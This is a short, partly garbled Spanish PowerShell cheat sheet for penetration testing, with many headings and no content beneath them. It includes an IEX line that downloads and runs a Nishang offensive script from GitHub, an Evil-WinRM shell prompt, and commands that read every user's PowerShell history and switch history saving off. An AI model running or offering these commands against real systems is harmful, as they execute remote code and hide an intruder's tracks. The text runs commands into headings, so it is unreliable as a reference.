Powershell
Ejecución de scripts remotos
IEX(New-Object Net.WebClient).downloadString("https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1")Listar procesos
*Evil-WinRM* PS C:\Users\alcibiades\Desktop> Get-ProcessVer historial
(Get-PSReadlineOption).HistorySavePathGet-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtTruco para no guardar historial
Set-PSReadlineOption -HistorySaveStyle SaveNothingunset HISTFILEObtener ADS
dir /r /s
more < hm.txt:root.txtObtener SID
Obtener Domain Admins
Secure-String a Plain-Text
Desde XML
Script Blocks
PS-Sessions
Listar reglas de Firewall
Obtener Eventos
WAF Evasion (Administrator)
Remplazar contenido
Listar sesiones RDP
Tomar captura de pantalla
Last updated